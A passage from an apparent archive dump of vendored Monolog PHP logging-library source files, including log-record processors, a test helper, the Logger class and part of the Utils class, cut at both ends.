__invoke(array $record): array { $record['extra']['tags'] = $this->tags; return $record; } } google-api/vendor/monolog/monolog/src/Monolog/Processor/WebProcessor.php000064400000006716147600400120022522 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Processor; /** * Injects url/method and remote IP of the current web request in all records * * @author Jordi Boggiano */ class WebProcessor implements ProcessorInterface { /** * @var array|\ArrayAccess */ protected $serverData; /** * Default fields * * Array is structured as [key in record.extra => key in $serverData] * * @var array */ protected $extraFields = [ 'url' => 'REQUEST_URI', 'ip' => 'REMOTE_ADDR', 'http_method' => 'REQUEST_METHOD', 'server' => 'SERVER_NAME', 'referrer' => 'HTTP_REFERER', 'user_agent' => 'HTTP_USER_AGENT', ]; /** * @param array|\ArrayAccess|null $serverData Array or object w/ ArrayAccess that provides access to the $_SERVER data * @param array|array|null $extraFields Field names and the related key inside $serverData to be added (or just a list of field names to use the default configured $serverData mapping). If not provided it defaults to: [url, ip, http_method, server, referrer] + unique_id if present in server data */ public function __construct($serverData = null, array $extraFields = null) { if (null === $serverData) { $this->serverData = &$_SERVER; } elseif (is_array($serverData) || $serverData instanceof \ArrayAccess) { $this->serverData = $serverData; } else { throw new \UnexpectedValueException('$serverData must be an array or object implementing ArrayAccess.'); } $defaultEnabled = ['url', 'ip', 'http_method', 'server', 'referrer']; if (isset($this->serverData['UNIQUE_ID'])) { $this->extraFields['unique_id'] = 'UNIQUE_ID'; $defaultEnabled[] = 'unique_id'; } if (null === $extraFields) { $extraFields = $defaultEnabled; } if (isset($extraFields[0])) { foreach (array_keys($this->extraFields) as $fieldName) { if (!in_array($fieldName, $extraFields)) { unset($this->extraFields[$fieldName]); } } } else { $this->extraFields = $extraFields; } } /** * {@inheritDoc} */ public function __invoke(array $record): array { // skip processing if for some reason request data // is not present (CLI or wonky SAPIs) if (!isset($this->serverData['REQUEST_URI'])) { return $record; } $record['extra'] = $this->appendExtraFields($record['extra']); return $record; } public function addExtraField(string $extraName, string $serverName): self { $this->extraFields[$extraName] = $serverName; return $this; } /** * @param mixed[] $extra * @return mixed[] */ private function appendExtraFields(array $extra): array { foreach ($this->extraFields as $extraName => $serverName) { $extra[$extraName] = $this->serverData[$serverName] ?? null; } return $extra; } } google-api/vendor/monolog/monolog/src/Monolog/Processor/UidProcessor.php000064400000002431147600400120022514 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Processor; use Monolog\ResettableInterface; /** * Adds a unique identifier into records * * @author Simon Mönch */ class UidProcessor implements ProcessorInterface, ResettableInterface { /** @var string */ private $uid; public function __construct(int $length = 7) { if ($length > 32 || $length < 1) { throw new \InvalidArgumentException('The uid length must be an integer between 1 and 32'); } $this->uid = $this->generateUid($length); } /** * {@inheritDoc} */ public function __invoke(array $record): array { $record['extra']['uid'] = $this->uid; return $record; } public function getUid(): string { return $this->uid; } public function reset() { $this->uid = $this->generateUid(strlen($this->uid)); } private function generateUid(int $length): string { return substr(bin2hex(random_bytes((int) ceil($length / 2))), 0, $length); } } google-api/vendor/monolog/monolog/src/Monolog/Processor/PsrLogMessageProcessor.php000064400000005737147600400120024522 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Processor; use Monolog\Utils; /** * Processes a record's message according to PSR-3 rules * * It replaces {foo} with the value from $context['foo'] * * @author Jordi Boggiano */ class PsrLogMessageProcessor implements ProcessorInterface { public const SIMPLE_DATE = "Y-m-d\TH:i:s.uP"; /** @var string|null */ private $dateFormat; /** @var bool */ private $removeUsedContextFields; /** * @param string|null $dateFormat The format of the timestamp: one supported by DateTime::format * @param bool $removeUsedContextFields If set to true the fields interpolated into message gets unset */ public function __construct(?string $dateFormat = null, bool $removeUsedContextFields = false) { $this->dateFormat = $dateFormat; $this->removeUsedContextFields = $removeUsedContextFields; } /** * {@inheritDoc} */ public function __invoke(array $record): array { if (false === strpos($record['message'], '{')) { return $record; } $replacements = []; foreach ($record['context'] as $key => $val) { $placeholder = '{' . $key . '}'; if (strpos($record['message'], $placeholder) === false) { continue; } if (is_null($val) || is_scalar($val) || (is_object($val) && method_exists($val, "__toString"))) { $replacements[$placeholder] = $val; } elseif ($val instanceof \DateTimeInterface) { if (!$this->dateFormat && $val instanceof \Monolog\DateTimeImmutable) { // handle monolog dates using __toString if no specific dateFormat was asked for // so that it follows the useMicroseconds flag $replacements[$placeholder] = (string) $val; } else { $replacements[$placeholder] = $val->format($this->dateFormat ?: static::SIMPLE_DATE); } } elseif ($val instanceof \UnitEnum) { $replacements[$placeholder] = $val instanceof \BackedEnum ? $val->value : $val->name; } elseif (is_object($val)) { $replacements[$placeholder] = '[object '.Utils::getClass($val).']'; } elseif (is_array($val)) { $replacements[$placeholder] = 'array'.Utils::jsonEncode($val, null, true); } else { $replacements[$placeholder] = '['.gettype($val).']'; } if ($this->removeUsedContextFields) { unset($record['context'][$key]); } } $record['message'] = strtr($record['message'], $replacements); return $record; } } google-api/vendor/monolog/monolog/src/Monolog/Processor/ProcessIdProcessor.php000064400000001137147600400120023670 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Processor; /** * Adds value of getmypid into records * * @author Andreas Hörnicke */ class ProcessIdProcessor implements ProcessorInterface { /** * {@inheritDoc} */ public function __invoke(array $record): array { $record['extra']['process_id'] = getmypid(); return $record; } } google-api/vendor/monolog/monolog/src/Monolog/Processor/GitProcessor.php000064400000003625147600400120022524 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Processor; use Monolog\Logger; use Psr\Log\LogLevel; /** * Injects Git branch and Git commit SHA in all records * * @author Nick Otter * @author Jordi Boggiano * * @phpstan-import-type Level from \Monolog\Logger * @phpstan-import-type LevelName from \Monolog\Logger */ class GitProcessor implements ProcessorInterface { /** @var int */ private $level; /** @var array{branch: string, commit: string}|array|null */ private static $cache = null; /** * @param string|int $level The minimum logging level at which this Processor will be triggered * * @phpstan-param Level|LevelName|LogLevel::* $level */ public function __construct($level = Logger::DEBUG) { $this->level = Logger::toMonologLevel($level); } /** * {@inheritDoc} */ public function __invoke(array $record): array { // return if the level is not high enough if ($record['level'] < $this->level) { return $record; } $record['extra']['git'] = self::getGitInfo(); return $record; } /** * @return array{branch: string, commit: string}|array */ private static function getGitInfo(): array { if (self::$cache) { return self::$cache; } $branches = `git branch -v --no-abbrev`; if ($branches && preg_match('{^\* (.+?)\s+([a-f0-9]{40})(?:\s|$)}m', $branches, $matches)) { return self::$cache = [ 'branch' => $matches[1], 'commit' => $matches[2], ]; } return self::$cache = []; } } google-api/vendor/monolog/monolog/src/Monolog/Processor/HostnameProcessor.php000064400000001324147600400120023551 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Processor; /** * Injects value of gethostname in all records */ class HostnameProcessor implements ProcessorInterface { /** @var string */ private static $host; public function __construct() { self::$host = (string) gethostname(); } /** * {@inheritDoc} */ public function __invoke(array $record): array { $record['extra']['hostname'] = self::$host; return $record; } } google-api/vendor/monolog/monolog/src/Monolog/Processor/MemoryProcessor.php000064400000003443147600400120023247 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Processor; /** * Some methods that are common for all memory processors * * @author Rob Jensen */ abstract class MemoryProcessor implements ProcessorInterface { /** * @var bool If true, get the real size of memory allocated from system. Else, only the memory used by emalloc() is reported. */ protected $realUsage; /** * @var bool If true, then format memory size to human readable string (MB, KB, B depending on size) */ protected $useFormatting; /** * @param bool $realUsage Set this to true to get the real size of memory allocated from system. * @param bool $useFormatting If true, then format memory size to human readable string (MB, KB, B depending on size) */ public function __construct(bool $realUsage = true, bool $useFormatting = true) { $this->realUsage = $realUsage; $this->useFormatting = $useFormatting; } /** * Formats bytes into a human readable string if $this->useFormatting is true, otherwise return $bytes as is * * @param int $bytes * @return string|int Formatted string if $this->useFormatting is true, otherwise return $bytes as int */ protected function formatBytes(int $bytes) { if (!$this->useFormatting) { return $bytes; } if ($bytes > 1024 * 1024) { return round($bytes / 1024 / 1024, 2).' MB'; } elseif ($bytes > 1024) { return round($bytes / 1024, 2).' KB'; } return $bytes . ' B'; } } google-api/vendor/monolog/monolog/src/Monolog/Processor/ProcessorInterface.php000064400000001242147600400120023672 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Processor; /** * An optional interface to allow labelling Monolog processors. * * @author Nicolas Grekas * * @phpstan-import-type Record from \Monolog\Logger */ interface ProcessorInterface { /** * @return array The processed record * * @phpstan-param Record $record * @phpstan-return Record */ public function __invoke(array $record); } google-api/vendor/monolog/monolog/src/Monolog/Processor/MercurialProcessor.php000064400000003550147600400120023721 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Processor; use Monolog\Logger; use Psr\Log\LogLevel; /** * Injects Hg branch and Hg revision number in all records * * @author Jonathan A. Schweder * * @phpstan-import-type LevelName from \Monolog\Logger * @phpstan-import-type Level from \Monolog\Logger */ class MercurialProcessor implements ProcessorInterface { /** @var Level */ private $level; /** @var array{branch: string, revision: string}|array|null */ private static $cache = null; /** * @param int|string $level The minimum logging level at which this Processor will be triggered * * @phpstan-param Level|LevelName|LogLevel::* $level */ public function __construct($level = Logger::DEBUG) { $this->level = Logger::toMonologLevel($level); } /** * {@inheritDoc} */ public function __invoke(array $record): array { // return if the level is not high enough if ($record['level'] < $this->level) { return $record; } $record['extra']['hg'] = self::getMercurialInfo(); return $record; } /** * @return array{branch: string, revision: string}|array */ private static function getMercurialInfo(): array { if (self::$cache) { return self::$cache; } $result = explode(' ', trim(`hg id -nb`)); if (count($result) >= 3) { return self::$cache = [ 'branch' => $result[1], 'revision' => $result[2], ]; } return self::$cache = []; } } google-api/vendor/monolog/monolog/src/Monolog/Test/TestCase.php000064400000004556147600400120020560 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Test; use Monolog\Logger; use Monolog\DateTimeImmutable; use Monolog\Formatter\FormatterInterface; /** * Lets you easily generate log records and a dummy formatter for testing purposes * * @author Jordi Boggiano * * @phpstan-import-type Record from \Monolog\Logger * @phpstan-import-type Level from \Monolog\Logger * * @internal feel free to reuse this to test your own handlers, this is marked internal to avoid issues with PHPStorm https://github.com/Seldaek/monolog/issues/1677 */ class TestCase extends \PHPUnit\Framework\TestCase { public function tearDown(): void { parent::tearDown(); if (isset($this->handler)) { unset($this->handler); } } /** * @param mixed[] $context * * @return array Record * * @phpstan-param Level $level * @phpstan-return Record */ protected function getRecord(int $level = Logger::WARNING, string $message = 'test', array $context = []): array { return [ 'message' => (string) $message, 'context' => $context, 'level' => $level, 'level_name' => Logger::getLevelName($level), 'channel' => 'test', 'datetime' => new DateTimeImmutable(true), 'extra' => [], ]; } /** * @phpstan-return Record[] */ protected function getMultipleRecords(): array { return [ $this->getRecord(Logger::DEBUG, 'debug message 1'), $this->getRecord(Logger::DEBUG, 'debug message 2'), $this->getRecord(Logger::INFO, 'information'), $this->getRecord(Logger::WARNING, 'warning'), $this->getRecord(Logger::ERROR, 'error'), ]; } protected function getIdentityFormatter(): FormatterInterface { $formatter = $this->createMock(FormatterInterface::class); $formatter->expects($this->any()) ->method('format') ->will($this->returnCallback(function ($record) { return $record['message']; })); return $formatter; } } google-api/vendor/monolog/monolog/src/Monolog/Logger.php000064400000054715147600400120017347 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog; use DateTimeZone; use Monolog\Handler\HandlerInterface; use Psr\Log\LoggerInterface; use Psr\Log\InvalidArgumentException; use Psr\Log\LogLevel; use Throwable; use Stringable; /** * Monolog log channel * * It contains a stack of Handlers and a stack of Processors, * and uses them to store records that are added to it. * * @author Jordi Boggiano * * @phpstan-type Level Logger::DEBUG|Logger::INFO|Logger::NOTICE|Logger::WARNING|Logger::ERROR|Logger::CRITICAL|Logger::ALERT|Logger::EMERGENCY * @phpstan-type LevelName 'DEBUG'|'INFO'|'NOTICE'|'WARNING'|'ERROR'|'CRITICAL'|'ALERT'|'EMERGENCY' * @phpstan-type Record array{message: string, context: mixed[], level: Level, level_name: LevelName, channel: string, datetime: \DateTimeImmutable, extra: mixed[]} */ class Logger implements LoggerInterface, ResettableInterface { /** * Detailed debug information */ public const DEBUG = 100; /** * Interesting events * * Examples: User logs in, SQL logs. */ public const INFO = 200; /** * Uncommon events */ public const NOTICE = 250; /** * Exceptional occurrences that are not errors * * Examples: Use of deprecated APIs, poor use of an API, * undesirable things that are not necessarily wrong. */ public const WARNING = 300; /** * Runtime errors */ public const ERROR = 400; /** * Critical conditions * * Example: Application component unavailable, unexpected exception. */ public const CRITICAL = 500; /** * Action must be taken immediately * * Example: Entire website down, database unavailable, etc. * This should trigger the SMS alerts and wake you up. */ public const ALERT = 550; /** * Urgent alert. */ public const EMERGENCY = 600; /** * Monolog API version * * This is only bumped when API breaks are done and should * follow the major version of the library * * @var int */ public const API = 2; /** * This is a static variable and not a constant to serve as an extension point for custom levels * * @var array $levels Logging levels with the levels as key * * @phpstan-var array $levels Logging levels with the levels as key */ protected static $levels = [ self::DEBUG => 'DEBUG', self::INFO => 'INFO', self::NOTICE => 'NOTICE', self::WARNING => 'WARNING', self::ERROR => 'ERROR', self::CRITICAL => 'CRITICAL', self::ALERT => 'ALERT', self::EMERGENCY => 'EMERGENCY', ]; /** * Mapping between levels numbers defined in RFC 5424 and Monolog ones * * @phpstan-var array $rfc_5424_levels */ private const RFC_5424_LEVELS = [ 7 => self::DEBUG, 6 => self::INFO, 5 => self::NOTICE, 4 => self::WARNING, 3 => self::ERROR, 2 => self::CRITICAL, 1 => self::ALERT, 0 => self::EMERGENCY, ]; /** * @var string */ protected $name; /** * The handler stack * * @var HandlerInterface[] */ protected $handlers; /** * Processors that will process all log records * * To process records of a single handler instead, add the processor on that specific handler * * @var callable[] */ protected $processors; /** * @var bool */ protected $microsecondTimestamps = true; /** * @var DateTimeZone */ protected $timezone; /** * @var callable|null */ protected $exceptionHandler; /** * @var int Keeps track of depth to prevent infinite logging loops */ private $logDepth = 0; /** * @var \WeakMap<\Fiber, int>|null Keeps track of depth inside fibers to prevent infinite logging loops */ private $fiberLogDepth; /** * @var bool Whether to detect infinite logging loops * * This can be disabled via {@see useLoggingLoopDetection} if you have async handlers that do not play well with this */ private $detectCycles = true; /** * @psalm-param array $processors * * @param string $name The logging channel, a simple descriptive name that is attached to all log records * @param HandlerInterface[] $handlers Optional stack of handlers, the first one in the array is called first, etc. * @param callable[] $processors Optional array of processors * @param DateTimeZone|null $timezone Optional timezone, if not provided date_default_timezone_get() will be used */ public function __construct(string $name, array $handlers = [], array $processors = [], ?DateTimeZone $timezone = null) { $this->name = $name; $this->setHandlers($handlers); $this->processors = $processors; $this->timezone = $timezone ?: new DateTimeZone(date_default_timezone_get() ?: 'UTC'); if (\PHP_VERSION_ID >= 80100) { // Local variable for phpstan, see https://github.com/phpstan/phpstan/issues/6732#issuecomment-1111118412 /** @var \WeakMap<\Fiber, int> $fiberLogDepth */ $fiberLogDepth = new \WeakMap(); $this->fiberLogDepth = $fiberLogDepth; } } public function getName(): string { return $this->name; } /** * Return a new cloned instance with the name changed */ public function withName(string $name): self { $new = clone $this; $new->name = $name; return $new; } /** * Pushes a handler on to the stack. */ public function pushHandler(HandlerInterface $handler): self { array_unshift($this->handlers, $handler); return $this; } /** * Pops a handler from the stack * * @throws \LogicException If empty handler stack */ public function popHandler(): HandlerInterface { if (!$this->handlers) { throw new \LogicException('You tried to pop from an empty handler stack.'); } return array_shift($this->handlers); } /** * Set handlers, replacing all existing ones. * * If a map is passed, keys will be ignored. * * @param HandlerInterface[] $handlers */ public function setHandlers(array $handlers): self { $this->handlers = []; foreach (array_reverse($handlers) as $handler) { $this->pushHandler($handler); } return $this; } /** * @return HandlerInterface[] */ public function getHandlers(): array { return $this->handlers; } /** * Adds a processor on to the stack. */ public function pushProcessor(callable $callback): self { array_unshift($this->processors, $callback); return $this; } /** * Removes the processor on top of the stack and returns it. * * @throws \LogicException If empty processor stack * @return callable */ public function popProcessor(): callable { if (!$this->processors) { throw new \LogicException('You tried to pop from an empty processor stack.'); } return array_shift($this->processors); } /** * @return callable[] */ public function getProcessors(): array { return $this->processors; } /** * Control the use of microsecond resolution timestamps in the 'datetime' * member of new records. * * As of PHP7.1 microseconds are always included by the engine, so * there is no performance penalty and Monolog 2 enabled microseconds * by default. This function lets you disable them though in case you want * to suppress microseconds from the output. * * @param bool $micro True to use microtime() to create timestamps */ public function useMicrosecondTimestamps(bool $micro): self { $this->microsecondTimestamps = $micro; return $this; } public function useLoggingLoopDetection(bool $detectCycles): self { $this->detectCycles = $detectCycles; return $this; } /** * Adds a log record. * * @param int $level The logging level (a Monolog or RFC 5424 level) * @param string $message The log message * @param mixed[] $context The log context * @param DateTimeImmutable $datetime Optional log date to log into the past or future * @return bool Whether the record has been processed * * @phpstan-param Level $level */ public function addRecord(int $level, string $message, array $context = [], DateTimeImmutable $datetime = null): bool { if (isset(self::RFC_5424_LEVELS[$level])) { $level = self::RFC_5424_LEVELS[$level]; } if ($this->detectCycles) { if (\PHP_VERSION_ID >= 80100 && $fiber = \Fiber::getCurrent()) { $this->fiberLogDepth[$fiber] = $this->fiberLogDepth[$fiber] ?? 0; $logDepth = ++$this->fiberLogDepth[$fiber]; } else { $logDepth = ++$this->logDepth; } } else { $logDepth = 0; } if ($logDepth === 3) { $this->warning('A possible infinite logging loop was detected and aborted. It appears some of your handler code is triggering logging, see the previous log record for a hint as to what may be the cause.'); return false; } elseif ($logDepth >= 5) { // log depth 4 is let through, so we can log the warning above return false; } try { $record = null; foreach ($this->handlers as $handler) { if (null === $record) { // skip creating the record as long as no handler is going to handle it if (!$handler->isHandling(['level' => $level])) { continue; } $levelName = static::getLevelName($level); $record = [ 'message' => $message, 'context' => $context, 'level' => $level, 'level_name' => $levelName, 'channel' => $this->name, 'datetime' => $datetime ?? new DateTimeImmutable($this->microsecondTimestamps, $this->timezone), 'extra' => [], ]; try { foreach ($this->processors as $processor) { $record = $processor($record); } } catch (Throwable $e) { $this->handleException($e, $record); return true; } } // once the record exists, send it to all handlers as long as the bubbling chain is not interrupted try { if (true === $handler->handle($record)) { break; } } catch (Throwable $e) { $this->handleException($e, $record); return true; } } } finally { if ($this->detectCycles) { if (isset($fiber)) { $this->fiberLogDepth[$fiber]--; } else { $this->logDepth--; } } } return null !== $record; } /** * Ends a log cycle and frees all resources used by handlers. * * Closing a Handler means flushing all buffers and freeing any open resources/handles. * Handlers that have been closed should be able to accept log records again and re-open * themselves on demand, but this may not always be possible depending on implementation. * * This is useful at the end of a request and will be called automatically on every handler * when they get destructed. */ public function close(): void { foreach ($this->handlers as $handler) { $handler->close(); } } /** * Ends a log cycle and resets all handlers and processors to their initial state. * * Resetting a Handler or a Processor means flushing/cleaning all buffers, resetting internal * state, and getting it back to a state in which it can receive log records again. * * This is useful in case you want to avoid logs leaking between two requests or jobs when you * have a long running process like a worker or an application server serving multiple requests * in one process. */ public function reset(): void { foreach ($this->handlers as $handler) { if ($handler instanceof ResettableInterface) { $handler->reset(); } } foreach ($this->processors as $processor) { if ($processor instanceof ResettableInterface) { $processor->reset(); } } } /** * Gets all supported logging levels. * * @return array Assoc array with human-readable level names => level codes. * @phpstan-return array */ public static function getLevels(): array { return array_flip(static::$levels); } /** * Gets the name of the logging level. * * @throws \Psr\Log\InvalidArgumentException If level is not defined * * @phpstan-param Level $level * @phpstan-return LevelName */ public static function getLevelName(int $level): string { if (!isset(static::$levels[$level])) { throw new InvalidArgumentException('Level "'.$level.'" is not defined, use one of: '.implode(', ', array_keys(static::$levels))); } return static::$levels[$level]; } /** * Converts PSR-3 levels to Monolog ones if necessary * * @param string|int $level Level number (monolog) or name (PSR-3) * @throws \Psr\Log\InvalidArgumentException If level is not defined * * @phpstan-param Level|LevelName|LogLevel::* $level * @phpstan-return Level */ public static function toMonologLevel($level): int { if (is_string($level)) { if (is_numeric($level)) { /** @phpstan-ignore-next-line */ return intval($level); } // Contains chars of all log levels and avoids using strtoupper() which may have // strange results depending on locale (for example, "i" will become "İ" in Turkish locale) $upper = strtr($level, 'abcdefgilmnortuwy', 'ABCDEFGILMNORTUWY'); if (defined(__CLASS__.'::'.$upper)) { return constant(__CLASS__ . '::' . $upper); } throw new InvalidArgumentException('Level "'.$level.'" is not defined, use one of: '.implode(', ', array_keys(static::$levels) + static::$levels)); } if (!is_int($level)) { throw new InvalidArgumentException('Level "'.var_export($level, true).'" is not defined, use one of: '.implode(', ', array_keys(static::$levels) + static::$levels)); } return $level; } /** * Checks whether the Logger has a handler that listens on the given level * * @phpstan-param Level $level */ public function isHandling(int $level): bool { $record = [ 'level' => $level, ]; foreach ($this->handlers as $handler) { if ($handler->isHandling($record)) { return true; } } return false; } /** * Set a custom exception handler that will be called if adding a new record fails * * The callable will receive an exception object and the record that failed to be logged */ public function setExceptionHandler(?callable $callback): self { $this->exceptionHandler = $callback; return $this; } public function getExceptionHandler(): ?callable { return $this->exceptionHandler; } /** * Adds a log record at an arbitrary level. * * This method allows for compatibility with common interfaces. * * @param mixed $level The log level (a Monolog, PSR-3 or RFC 5424 level) * @param string|Stringable $message The log message * @param mixed[] $context The log context * * @phpstan-param Level|LevelName|LogLevel::* $level */ public function log($level, $message, array $context = []): void { if (!is_int($level) && !is_string($level)) { throw new \InvalidArgumentException('$level is expected to be a string or int'); } if (isset(self::RFC_5424_LEVELS[$level])) { $level = self::RFC_5424_LEVELS[$level]; } $level = static::toMonologLevel($level); $this->addRecord($level, (string) $message, $context); } /** * Adds a log record at the DEBUG level. * * This method allows for compatibility with common interfaces. * * @param string|Stringable $message The log message * @param mixed[] $context The log context */ public function debug($message, array $context = []): void { $this->addRecord(static::DEBUG, (string) $message, $context); } /** * Adds a log record at the INFO level. * * This method allows for compatibility with common interfaces. * * @param string|Stringable $message The log message * @param mixed[] $context The log context */ public function info($message, array $context = []): void { $this->addRecord(static::INFO, (string) $message, $context); } /** * Adds a log record at the NOTICE level. * * This method allows for compatibility with common interfaces. * * @param string|Stringable $message The log message * @param mixed[] $context The log context */ public function notice($message, array $context = []): void { $this->addRecord(static::NOTICE, (string) $message, $context); } /** * Adds a log record at the WARNING level. * * This method allows for compatibility with common interfaces. * * @param string|Stringable $message The log message * @param mixed[] $context The log context */ public function warning($message, array $context = []): void { $this->addRecord(static::WARNING, (string) $message, $context); } /** * Adds a log record at the ERROR level. * * This method allows for compatibility with common interfaces. * * @param string|Stringable $message The log message * @param mixed[] $context The log context */ public function error($message, array $context = []): void { $this->addRecord(static::ERROR, (string) $message, $context); } /** * Adds a log record at the CRITICAL level. * * This method allows for compatibility with common interfaces. * * @param string|Stringable $message The log message * @param mixed[] $context The log context */ public function critical($message, array $context = []): void { $this->addRecord(static::CRITICAL, (string) $message, $context); } /** * Adds a log record at the ALERT level. * * This method allows for compatibility with common interfaces. * * @param string|Stringable $message The log message * @param mixed[] $context The log context */ public function alert($message, array $context = []): void { $this->addRecord(static::ALERT, (string) $message, $context); } /** * Adds a log record at the EMERGENCY level. * * This method allows for compatibility with common interfaces. * * @param string|Stringable $message The log message * @param mixed[] $context The log context */ public function emergency($message, array $context = []): void { $this->addRecord(static::EMERGENCY, (string) $message, $context); } /** * Sets the timezone to be used for the timestamp of log records. */ public function setTimezone(DateTimeZone $tz): self { $this->timezone = $tz; return $this; } /** * Returns the timezone to be used for the timestamp of log records. */ public function getTimezone(): DateTimeZone { return $this->timezone; } /** * Delegates exception management to the custom exception handler, * or throws the exception if no custom handler is set. * * @param array $record * @phpstan-param Record $record */ protected function handleException(Throwable $e, array $record): void { if (!$this->exceptionHandler) { throw $e; } ($this->exceptionHandler)($e, $record); } /** * @return array */ public function __serialize(): array { return [ 'name' => $this->name, 'handlers' => $this->handlers, 'processors' => $this->processors, 'microsecondTimestamps' => $this->microsecondTimestamps, 'timezone' => $this->timezone, 'exceptionHandler' => $this->exceptionHandler, 'logDepth' => $this->logDepth, 'detectCycles' => $this->detectCycles, ]; } /** * @param array $data */ public function __unserialize(array $data): void { foreach (['name', 'handlers', 'processors', 'microsecondTimestamps', 'timezone', 'exceptionHandler', 'logDepth', 'detectCycles'] as $property) { if (isset($data[$property])) { $this->$property = $data[$property]; } } if (\PHP_VERSION_ID >= 80100) { // Local variable for phpstan, see https://github.com/phpstan/phpstan/issues/6732#issuecomment-1111118412 /** @var \WeakMap<\Fiber, int> $fiberLogDepth */ $fiberLogDepth = new \WeakMap(); $this->fiberLogDepth = $fiberLogDepth; } } } google-api/vendor/monolog/monolog/src/Monolog/Utils.php000064400000022501147600400120017214 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog; final class Utils { const DEFAULT_JSON_FLAGS = JSON_UNESCAPED_SLASHES | JSON_UNESCAPED_UNICODE | JSON_PRESERVE_ZERO_FRACTION | JSON_INVALID_UTF8_SUBSTITUTE | JSON_PARTIAL_OUTPUT_ON_ERROR; public static function getClass(object $object): string { $class = \get_class($object); if (false === ($pos = \strpos($class, "@anonymous\0"))) { return $class; } if (false === ($parent = \get_parent_class($class))) { return \substr($class, 0, $pos + 10); } return $parent . '@anonymous'; } public static function substr(string $string, int $start, ?int $length = null): string { if (extension_loaded('mbstring')) { return mb_strcut($string, $start, $length); } return substr($string, $start, (null === $length) ? strlen($string) : $length); } /** * Makes sure if a relative path is passed in it is turned into an absolute path * * @param string $streamUrl stream URL or path without protocol */ public static function canonicalizePath(string $streamUrl): string { $prefix = ''; if ('file://' === substr($streamUrl, 0, 7)) { $streamUrl = substr($streamUrl, 7); $prefix = 'file://'; } // other type of stream, not supported if (false !== strpos($streamUrl, '://')) { return $streamUrl; } // already absolute if (substr($streamUrl, 0, 1) === '/' || substr($streamUrl, 1, 1) === ':' || substr($streamUrl, 0, 2) === '\\\\') { return $prefix.$streamUrl; } $streamUrl = getcwd() . '/' . $streamUrl; return $prefix.$streamUrl; } /** * Return the JSON representation of a value * * @param mixed $data * @param int $encodeFlags flags to pass to json encode, defaults to DEFAULT_JSON_FLAGS * @param bool $ignoreErrors whether to ignore encoding errors or to throw on error, when ignored and the encoding fails, "null" is returned which is valid json for null * @throws \RuntimeException if encoding fails and errors are not ignored * @return string when errors are ignored and the encoding fails, "null" is returned which is valid json for null */ public static function jsonEncode($data, ?int $encodeFlags = null, bool $ignoreErrors = false): string { if (null === $encodeFlags) { $encodeFlags = self::DEFAULT_JSON_FLAGS; } if ($ignoreErrors) { $json = @json_encode($data, $encodeFlags); if (false === $json) { return 'null'; } return $json; } $json = json_encode($data, $encodeFlags); if (false === $json) { $json = self::handleJsonError(json_last_error(), $data); } return $json; } /** * Handle a json_encode failure. * * If the failure is due to invalid string encoding, try to clean the * input and encode again. If the second encoding attempt fails, the * initial error is not encoding related or the input can't be cleaned then * raise a descriptive exception. * * @param int $code return code of json_last_error function * @param mixed $data data that was meant to be encoded * @param int $encodeFlags flags to pass to json encode, defaults to JSON_UNESCAPED_SLASHES | JSON_UNESCAPED_UNICODE | JSON_PRESERVE_ZERO_FRACTION * @throws \RuntimeException if failure can't be corrected * @return string JSON encoded data after error correction */ public static function handleJsonError(int $code, $data, ?int $encodeFlags = null): string { if ($code !== JSON_ERROR_UTF8) { self::throwEncodeError($code, $data); } if (is_string($data)) { self::detectAndCleanUtf8($data); } elseif (is_array($data)) { array_walk_recursive($data, array('Monolog\Utils', 'detectAndCleanUtf8')); } else { self::throwEncodeError($code, $data); } if (null === $encodeFlags) { $encodeFlags = self::DEFAULT_JSON_FLAGS; } $json = json_encode($data, $encodeFlags); if ($json === false) { self::throwEncodeError(json_last_error(), $data); } return $json; } /** * @internal */ public static function pcreLastErrorMessage(int $code): string { if (PHP_VERSION_ID >= 80000) { return preg_last_error_msg(); } $constants = (get_defined_constants(true))['pcre']; $constants = array_filter($constants, function ($key) { return substr($key, -6) == '_ERROR'; }, ARRAY_FILTER_USE_KEY); $constants = array_flip($constants); return $constants[$code] ?? 'UNDEFINED_ERROR'; } /** * Throws an exception according to a given code with a customized message * * @param int $code return code of json_last_error function * @param mixed $data data that was meant to be encoded * @throws \RuntimeException * * @return never */ private static function throwEncodeError(int $code, $data): void { switch ($code) { case JSON_ERROR_DEPTH: $msg = 'Maximum stack depth exceeded'; break; case JSON_ERROR_STATE_MISMATCH: $msg = 'Underflow or the modes mismatch'; break; case JSON_ERROR_CTRL_CHAR: $msg = 'Unexpected control character found'; break; case JSON_ERROR_UTF8: $msg = 'Malformed UTF-8 characters, possibly incorrectly encoded'; break; default: $msg = 'Unknown error'; } throw new \RuntimeException('JSON encoding failed: '.$msg.'. Encoding: '.var_export($data, true)); } /** * Detect invalid UTF-8 string characters and convert to valid UTF-8. * * Valid UTF-8 input will be left unmodified, but strings containing * invalid UTF-8 codepoints will be reencoded as UTF-8 with an assumed * original encoding of ISO-8859-15. This conversion may result in * incorrect output if the actual encoding was not ISO-8859-15, but it * will be clean UTF-8 output and will not rely on expensive and fragile * detection algorithms. * * Function converts the input in place in the passed variable so that it * can be used as a callback for array_walk_recursive. * * @param mixed $data Input to check and convert if needed, passed by ref */ private static function detectAndCleanUtf8(&$data): void { if (is_string($data) && !preg_match('//u', $data)) { $data = preg_replace_callback( '/[\x80-\xFF]+/', function ($m) { return function_exists('mb_convert_encoding') ? mb_convert_encoding($m[0], 'UTF-8', 'ISO-8859-1') : utf8_encode($m[0]); }, $data ); if (!is_string($data)) { $pcreErrorCode = preg_last_error(); throw new \RuntimeException('Failed to preg_replace_callback: ' . $pcreErrorCode . ' / ' . self::pcreLastErrorMessage($pcreErrorCode)); } $data = str_replace( 